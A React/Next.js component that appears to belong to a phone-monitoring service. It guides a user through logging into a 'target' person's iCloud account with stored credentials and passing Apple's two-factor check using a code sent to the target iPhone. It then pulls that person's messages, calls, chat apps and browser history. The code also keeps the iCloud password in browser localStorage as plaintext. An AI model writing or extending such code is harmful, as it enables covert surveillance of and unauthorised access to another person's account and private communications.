import { useEffect, useState } from 'react'
import Image from 'next/image'
import dynamic from 'next/dynamic'
import { useDispatch } from 'react-redux'
import { useTranslation } from 'src/utils/i18n'
import { Select, Spin } from 'antd'
import ExtremeVerfiyCommponents from './style'
import { useRouter } from 'next/router'
import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  sendDownloadTime,
  iosLoginVerification
} from 'src/@api/login'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import { MessageInfo } from 'src/components/pop-up-window'
import { messageInfo } from 'src/components/Message'
import { fetchResetTime, changeDownloadTips, changeBasicVerfiyOver, changeExtremeService } from 'src/store/apps/Common'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import AdvancedDownloadForm from 'src/@core/layouts/components/vertical/navigation/AdvancedDownloadForm'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('src/@core/components/common/codeBox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

//   增值服务服务 app 图标列表
const extremeIcon = [
  {
    name: 'Text message',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_SMS
  },
  {
    name: 'Call',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_CALLS
  },
  {
    name: 'Voicemail',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_VOICEMAIL
  },
  {
    name: 'WhatsApp',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_WHATSAPP
  },
  {
    name: 'WA Business',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_WHATSAPPBUSINESS
  },
  {
    name: 'Line',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_LINE
  },
  {
    name: 'Kik',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_KIK
  },
  {
    name: 'WeChat',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_WECHAT
  },
  {
    name: 'Messenger',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_MESSENGER
  },
  {
    name: 'Browser history',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_HISTORY
  },
  {
    name: 'Browser Bookmark',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_BOOKMARK
  },
  {
    name: 'Install Apps',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_APPS
  },
  {
    name: 'Wi-Fi network',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_WIFI
  },
  {
    name: 'Skype',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_SKYPE
  },
  {
    name: 'Teams',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_TEAMS
  },
  {
    name: 'Telegram',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_TELEGRAM
  },
  {
    name: 'Snapchat',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_SNAPCHAT
  },
  {
    name: 'Instagram',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_INSTAGRAM
  },
  {
    name: 'Facetime',
    img: process.env.NEXT_PUBLIC_DASHBOARD_ICON_IOS_FACETIME
  }
]

const ExtremeVerfiy = ({ setJustVerified }) => {

  const dispatch = useDispatch()
  const { t } = useTranslation('common')
  const [loginLoading, setLoginLoading] = useState(false) // 验证中状态
  const [current, setCurrent] = useState(0) // 当前验证的步骤，发送验证码 or 填写验证码
  const [innerWidth, setInnerWidth] = useState(0) // 实时屏幕宽度

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [smsId, setSmsId] = useState('')
  const [key, setKey] = useState('1')
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案
  const [codeErrorText, setCodeErrorText] = useState('')
  const [codeBoxKey, setCodeBoxKey] = useState(0)

  // 重填 iCloud 账号密码的弹窗：> 0 时挂载，值变化即重新挂载（每次报错都从「填密码」那一步开始）
  const [fixPasswordKey, setFixPasswordKey] = useState(0)

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)
  const router = useRouter()

  let user = JSON.parse(localStorage.getItem('DeviceUser')) // 获取浏览器缓存中的用户信息

  const persistUserCredentials = (username, password) => {
    const deviceUser = JSON.parse(localStorage.getItem('DeviceUser')) || {}
    const nextUser = { ...deviceUser, username, password }
    window.localStorage.setItem('DeviceUser', JSON.stringify(nextUser))
    user = nextUser

    return nextUser
  }

  const applyExtremeTwoStepVerification = (data, username, password) => {
    persistUserCredentials(username, password)
    MessageInfo(data.em)
    setCurrent(1)

    if (data?.ecurityType == 2) setKey('2')

    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(
        data.trustedPhoneNumbers.map(item => ({
          ...item,
          value: item.id,
          label: item.numberWithDialCode,
        }))
      )
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      if (data?.ecPhoneList === 0) {
        setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
      } else {
        setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
      }
    }

    setSmsPhoneListLoading(false)
  }

  const finishExtremeDirectSuccess = async (data, username, password) => {
    persistUserCredentials(username, password)
    MessageInfo({ content: data.em, type: 'success' })

    const updateRes = await updateDeviceCredentials({
      username,
      password,
      verify: 1,
    })

    if (!isUpdateCredentialsOk(updateRes)) {
      MessageInfo({ content: updateRes?.msg || data.em, type: 'error' })

      return
    }

    window.localStorage.setItem('Advanced', 1)
    dispatch(changeDownloadTips(true))
    dispatch(changeBasicVerfiyOver(false))
    dispatch(changeExtremeService(false))
    setJustVerified(true)

    await downloadWeb({ mode: 2, username, password })
    await sendDownloadTime({ username, type: 'advanced_download' })
    setTimeout(() => {
      dispatch(fetchResetTime())
    }, 800)
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 2,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => {
      applyExtremeTwoStepVerification(data, username, password)
    },
    onDirectSuccess: async ({ data, username, password }) => {
      await finishExtremeDirectSuccess(data, username, password)
    },
  })

  // 10003（iCloud 密码不对）处理：本页没有账号密码输入框，凭据取自本地缓存，无处可退回重填，
  // 所以直接复用侧栏「更新数据」在密码错误时弹出的高级验证弹窗（AdvancedDownloadForm）：
  // 账号密码都能改，改完重新验证，成功后会自行下载数据并更新设备凭据。
  // 弹窗正开着 / 被锁弹窗开着时不再重复弹（弹窗内部会显示错误文案）。
  // @returns {boolean} true = 已弹出弹窗，调用方不要再叠加 toast / 行内报错
  const handlePasswordError = (ec, message) => {
    if (ec !== ICLOUD_EC.PASSWORD || lockedFlowOpen || fixPasswordKey > 0) return false

    setFixPasswordKey(k => k + 1)

    return true
  }

  // 弹窗内验证通过：下载与凭据更新它已经做完，这里只补齐页面状态并进入下一步（备份提示）
  const handlePasswordFixed = () => {
    setFixPasswordKey(0)
    dispatch(changeDownloadTips(true))
    dispatch(changeBasicVerfiyOver(false))
    dispatch(changeExtremeService(false))
    setJustVerified(true)
  }

  const onChange = async key => {
    if (key == 2) {
      let check = sessionStorage.getItem('icloudPhoneSmsList')
      let result = {}
      if (check) {
        result = JSON.parse(check)
      } else {
        let mode = 1

        result = await authInfo({
          mode: mode,
          username: user.username,
          password: user.password
        })
        sessionStorage.setItem('icloudPhoneSmsList', JSON.stringify(result))
      }

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)
      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  // 发送设备码
  const sendCode = async () => {
    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        country: (JSON.parse(localStorage.getItem("userData"))?.data?.country_name || '').toLocaleLowerCase()
      })
      data = res?.data
    } catch (e) {
      console.error('[extreme-verfiy sendCode] iosLoginVerification failed', e)
      setLoginLoading(false)
      MessageInfo({ content: e?.data?.em || t('Network error, please try again'), type: 'error' })

      return
    }

    setLoginLoading(false)

    // 业务错误码在 data.ec（如 10005 Apple ID locked）；顶层 code / HTTP 状态码为 0 不代表成功
    if (!data || typeof data !== 'object') {
      MessageInfo({ content: t('Network error, please try again'), type: 'error' })

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      setLoginLoading(false)

      // 已弹出重填密码弹窗时不再叠加 toast（弹窗内会显示同一条错误文案）
      if (!handlePasswordError(data.ec, data.em)) {
        MessageInfo({ content: data.em, type: 'error' })
      }
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      setLoginLoading(false)
      MessageInfo(data.em)
      setCurrent(1)
      if (data?.ecurityType == 2) setKey('2')
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      setLoginLoading(false)
      await handleEc10005({ username: user.username, password: user.password })
    } else if (isIcloudOk(data)) {
      setLoginLoading(false)

      MessageInfo({ content: data.em, type: 'success' })

      const updateRes = await updateDeviceCredentials({
        username: user.username,
        password: user.password,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        MessageInfo({ content: updateRes?.msg || data.em, type: 'error' })

        return
      }

      window.localStorage.setItem('Advanced', 1)

      // 设置允许正在下载提示信息弹窗
      dispatch(changeDownloadTips(true))

      // 设置一步验证结束状态
      dispatch(changeBasicVerfiyOver(false))

      // 默认先把extreme服务设为 false 防止备份提示页面出现无数据提示，不影响下次打开页面
      dispatch(changeExtremeService(false))

      // 设置为刚完成验证
      setJustVerified(true)

      let downloadRes = await downloadWeb({
        mode: 2,
        username: user.username,
        password: user.password
      })

      await sendDownloadTime({ username: user.username, type: 'advanced_download' })
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)
    } else {
      MessageInfo({ content: data.em, type: 'error' })
    }
  }

  // 验证设备码
  const codeDevice = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setCodeErrorText('')
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        const updateRes = await updateDeviceCredentials({
          username: user.username,
          password: user.password,
          verify: 1
        })

        if (!isUpdateCredentialsOk(updateRes)) {
          MessageInfo({ content: updateRes?.msg || 'Update failed, please try again', type: 'error' })

          return
        }

        window.localStorage.setItem('Advanced', 1)

        const verify = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          country: (JSON.parse(localStorage.getItem("userData"))?.data?.country_name || '').toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          setCodeErrorText(t('Network error, please try again'))
          setCodeBoxKey(k => k + 1)

          return
        }

        if (isIcloudOk(verify.data)) {

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证结束状态
          dispatch(changeBasicVerfiyOver(false))

          // 默认先把extreme服务设为 false 防止备份提示页面出现无数据提示，不影响下次打开页面
          dispatch(changeExtremeService(false))

          // 设置为刚完成验证
          setJustVerified(true)

          let downloadRes = await downloadWeb({ mode: 2, username: user.username, password: user.password })

          await sendDownloadTime({ username: user.username, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)
        } else {
          const tip = verify.data.em || t('Incorrect verification code Please try again')

          // 10003 是密码不对，不是验证码错：弹重填密码弹窗，不再在验证码下方提示
          if (!handlePasswordError(verify.data.ec, tip)) {
            setCodeErrorText(tip)
            setCodeBoxKey(k => k + 1)
          }
        }
      } catch (err) {
        console.error('[extreme-verfiy codeDevice] failed', err)
        setCodeErrorText(err?.data?.em || t('Network error, please try again'))
        setCodeBoxKey(k => k + 1)
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 手机号列表选择更改
  const handleSelectChange = value => {
    setSmsId(value)
  }

  // 发送短信验证码
  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const result = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        phoneID: smsId,
        country: (JSON.parse(localStorage.getItem("userData"))?.data?.country_name || '').toLocaleLowerCase()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = result?.data?.ec
      if (!isIcloudSendOk(ec)) {
        // 10003 已弹出重填密码弹窗时不再叠加 toast
        if (!handlePasswordError(ec, result?.data?.em)) {
          messageInfo(result?.data?.em || 'Failed to send the verification code, please try again')
        }

        return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(`SMS has been sent, please receive`)
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      messageInfo(e?.data?.em || 'Failed to send the verification code, please try again')
    }
  }

  // 验证短信验证码
  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setCodeErrorText('')
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        const result = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          phoneID: smsId,
          country: (JSON.parse(localStorage.getItem("userData"))?.data?.country_name || '').toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          setCodeErrorText(t('Network error, please try again'))
          setCodeBoxKey(k => k + 1)

          return
        }

        if (isIcloudOk(result.data)) {

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证结束状态
          dispatch(changeBasicVerfiyOver(false))

          // 默认先把extreme服务设为 false 防止备份提示页面出现无数据提示，不影响下次打开页面
          dispatch(changeExtremeService(false))

          // 设置为刚完成验证
          setJustVerified(true)

          let downloadRes = await downloadWeb({
            mode: 2,
            username: user.username,
            password: user.password
          })

          await sendDownloadTime({ username: user.username, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)

          window.localStorage.setItem('Advanced', 1)
        } else {
          const tip = result.data.em || t('Incorrect verification code Please try again')

          // 10003 是密码不对，不是验证码错：弹重填密码弹窗，不再在验证码下方提示
          if (!handlePasswordError(result.data.ec, tip)) {
            setCodeErrorText(tip)
            setCodeBoxKey(k => k + 1)
          }
        }
      } catch (err) {
        console.error('[extreme-verfiy codeSms] failed', err)
        setCodeErrorText(err?.data?.em || t('Network error, please try again'))
        setCodeBoxKey(k => k + 1)
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 监听屏幕宽度
  useEffect(() => {
    if (typeof window !== 'undefined') {
      const handlerInnerWidth = () => {
        setInnerWidth(window.innerWidth)
      }

      handlerInnerWidth()

      window.addEventListener('resize', handlerInnerWidth)

      return () => {
        window.removeEventListener('resize', handlerInnerWidth)
      }
    }
  }, [])

  useEffect(() => {
  }, [])

  const StepProgress = ({ current, total }) => {
    const barWidth = 72;//宽度

    return (
      <div className="flex items-center gap-4 mb-[40px] Mlg:mb-[20px]">
        <div className="text-[20px] leading-[30px] font-medium text-[#484B60] Mlg:text-[16px] Mlg:leading-[24px] ">
          {current}/{total}
        </div>

        <div className="flex gap-x-[6px]">
          {Array.from({ length: total }).map((_, i) => {
            const active = i < current;

            return (
              <div
                key={i}
                className="h-[4px] w-[72px] Mlg:w-[51.8px] rounded-[1px]"
                style={
                  active
                    ? {
                      background: "linear-gradient(90deg, #09A6EA 1.56%, #6838F2 47.99%)",
                      backgroundSize: `${current * barWidth}px 4px`,
                      backgroundPosition: `-${i * barWidth}px 0px`,
                    }
                    : {
                      background: "#E8EDFF",
                    }
                }
              />
            )
          })}
        </div>
      </div>
    )
  }

  return (
    <ExtremeVerfiyCommponents className={`w-full ${current == 0 ? 'max-w-[544px] Mlg:px-[12px] smj:pb-4' : 'max-w-[440px] Mlg:px-[24px]'} h-max`}>
      {current === 0 ? <StepProgress current={3} total={5} /> : <StepProgress current={4} total={5} />}
      {/* apple Icon */}
      <Image src='/images/apps/apple.svg' alt='img' className='w-[60px] h-[69px] Mlg:w-[35px] Mlg:h-[40px]' width='60' height='69' />

      {/* 黑色标题 */}
      <p className={`my-[24px] Mlg:mb-[30px] text-[24px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[40px] Mlg:leading-[24px] ${current != 0 ? 'hidden' : ''}`}>{t('Extreme Data Verification')}</p>

      {
        current == 0 ?
          <>
            {/* 增值服务 app 图标列表 */}
            < ul className='grid grid-cols-10 Mlg:grid-cols-6 gap-[16px]'>
              {
                extremeIcon.map((item, index) => (
                  <li key={index}>
                    <Image src={item.img} alt={item.name} className='w-[40px] h-[40px] object-cover p-[2px] rounded-[8px] bg-[#F0F1F5]' width='40' height='40' />
                  </li>
                ))
              }
            </ul>

            {/* 黑色描述文案 */}
            <p className='w-full max-w-[484px] Mlg:max-w-[253px] mt-[48px] Mlg:mt-[16px] mb-[32px] Mlg:mb-[24px] text-[20px] Mlg:text-[14px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[21px]'>
              {t('Access to')}{' '}extreme{' '}{t('data requires re-verification now is the best time to do so')}
            </p>

            {/* 发送验证码按钮 */}
            <button
              className={`${loginLoading ? 'opacity-70' : ''} w-max min-w-[334px] Mlg:min-w-[264px] max-w-full h-[48px] Mlg:h-[40px] px-[21px] bg-[#FFCF55] text-[#222222] text-[16px] font-[600] rounded-[41px] flex justify-center items-center`}
              onClick={() => {
                if (loginLoading) return
                sendCode()
              }}
            >
              {t('Send Code Again')}
              {loginLoading && (
                <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
              )}
            </button>

            {/* 分割线 */}
            <hr className='w-[480px] Mlg:w-full bg-[#9A9A9E] mt-[32px] Mlg:mt-[24px] mb-[16px]' />

            {/* 次文案 */}
            <p className='text-[14px] text-[#000000] leading-[22px]'>*{t('Youve obtained all basic data')}</p>
          </>
          :
          <>
            {/* 黑色标题 */}
            {/* <p className='mt-[23px] mb-[24px] text-[20px] text-[#282938] text-center font-[600] leading-[30px] lg:hidden'>{t('Extreme Data Verification')}</p> */}

            {/* 分割线 */}
            {/* <hr className='w-full bg-[#DADADA] absolute top-[101px] lg:hidden' /> */}

            {/* apple Icon */}
            {/* <Image src='/images/apps/apple.svg' alt='img' className='w-[35px] h-[40px] my-[20px] lg:hidden' width='60' height='69' /> */}

            <p className='max-w-[484px] text-[20px] mt-[26px] Mlg:mt-[24px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[24px]'>
              {t('Choose a Verification Method')}
            </p>
            <div className='w-[310px] Mlg:w-full'>
              <div className='w-full h-[27px] flex items-center my-[26px] Mlg:mt-[18px] Mlg:mb-[30px]'>
                <div
                  className={`${key == '1'
                    ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                    : 'text-[14px] text-[#000] border-b-[#FFF]'
                    } h-[27px] border-b-[2px] flex items-center cursor-pointer`}
                  onClick={() => {
                    if (key == '1') return
                    setCodeErrorText('')
                    setKey('1')
                  }}
                >
                  {t('Device')}
                </div>
                <div
                  className={`${key == '2'
                    ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                    : 'text-[14px] text-[#000] border-b-[#FFF]'
                    } ml-[18px] h-[27px] flex items-center border-b-[2px] cursor-pointer`}
                  onClick={() => {
                    if (key == '2') return
                    if (smsPhoneListDisabled) {
                      MessageInfo(smsErrorText)
                    } else {
                      setCodeErrorText('')
                      setKey('2')
                    }
                  }}
                >
                  {t('SMS')}
                </div>
              </div>
              {key == '1' && (
                <>
                  <Spin spinning={loginLoading}>
                    <CodeBox
                      key={`device-${codeBoxKey}`}
                      length={6} // 输入框数量
                      inputType='numeric' // 输入框输入类型
                      size={innerWidth > 768 ? 45 : 42} // 输入框大小
                      gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                      styles={{
                        background: '#F5F6F7',
                        borderRadius: '8px',
                        color: '#494949',
                        fontFamily: 'Poppins',
                        fontSize: '26px'
                      }} // 统一设置所有框的样式
                      onChange={codeDevice} // 验证码输入完毕时的回调
                    />
                  </Spin>
                  {codeErrorText ? (
                    <p className='mt-[12px] text-center text-[13px] leading-[20px] text-[#E5484D]'>{codeErrorText}</p>
                  ) : null}
                  <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                    {t('A verification code has been sent to the target iPhone Enter the verification code')}
                  </p>
                </>
              )}
              {key == '2' && (
                <>
                  <div className='h-[45px] Mlg:h-[40px] mb-[24px] Mlg:mb-[20px] flex'>
                    <Select
                      defaultValue={defaultSmsPhone}
                      style={{
                        flex: 1,
                        height: '100%'
                      }}
                      suffixIcon={
                        smsPhoneListLoading ? (
                          <div className='w-[18px] h-[18px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                        ) : (
                          <Image
                            className='mr-[5px]'
                            src='/images/user-verify/dropdown.svg'
                            width={14}
                            height={0}
                            alt='dropDown'
                          />
                        )
                      }
                      disabled={smsPhoneListDisabled}
                      onChange={handleSelectChange}
                      options={smsPhoneList}
                    />
                    <button
                      disabled={btnDisable}
                      className='w-full max-w-max min-w-[85px] h-full flex justify-center items-center'
                      style={{
                        opacity: btnDisable ? 0.7 : 1,
                        background: '#FFCF55',
                        padding: '0px 21px',
                        marginLeft: '10px',
                        color: '#1B1C2B',
                        borderRadius: '41px',
                        fontSize: '18px'
                      }}
                      onClick={sendSms}
                    >
                      {btnDisable ? sendTime : t('Send')}
                    </button>
                  </div>

                  {sendContentTips != '' && (
                    <p className='text-center mb-[24px] text-[12px] text-[#9A9A9E]'> {sendContentTips}</p>
                  )}
                  <Spin spinning={loginLoading}>
                    <CodeBox
                      key={`sms-${codeBoxKey}`}
                      length={6} // 输入框数量
                      inputType='numeric' // 输入框输入类型
                      size={innerWidth > 768 ? 45 : 42} // 输入框大小
                      gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                      styles={{
                        background: '#F5F6F7',
                        borderRadius: '8px',
                        color: '#494949',
                        fontFamily: 'Poppins',
                        fontSize: '26px'
                      }} // 统一设置所有框的样式
                      onChange={codeSms} // 验证码输入完毕时的回调
                    />
                  </Spin>
                  {codeErrorText ? (
                    <p className='mt-[12px] text-center text-[13px] leading-[20px] text-[#E5484D]'>{codeErrorText}</p>
                  ) : null}
                  <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                    {t('Enter the verification code')}
                  </p>
                </>
              )}

              {/* 返回按钮 */}
              {router.asPath.includes('/ios/setup') &&
                <div className='w-full mx-auto fixed bottom-0 left-[150px] Mlg:left-0 right-0 bg-white border-t-[1px] border-[#E5E7EB]'>
                  <div className='flex justify-center w-full p-5 Mlg:px-0 bg-white mx-auto'>
                    <div className='w-full lg:w-[620px] flex justify-between smj:px-4'>
                      <button onClick={() => { setCurrent(0) }}
                        className='border-[1px] border-[#454CFF] bg-white rounded-[24px] h-[35px] flex items-center pl-[10px] pr-[19px]'>
                        <Image className='mr-[7px]' src='/images/bind/bind-arrow-blue.svg' width={18} height={18} alt='back' />
                        <span className='text-[15px] text-[#454CFF] font-[600]'>{t('BACK')}</span>
                      </button>
                    </div>
                  </div>
                </div>}
            </div>
          </>
      }
      {lockedFlowModals}

      {/* 10003 重填账号密码：复用侧栏「更新数据」的高级验证弹窗，从「填账号密码」那一步打开 */}
      {fixPasswordKey > 0 && (
        <AdvancedDownloadForm
          key={fixPasswordKey}
          data={0}
          closeModal={() => setFixPasswordKey(0)}
          onSuccess={handlePasswordFixed}
        />
      )}
    </ExtremeVerfiyCommponents>
  )
}

export default ExtremeVerfiy
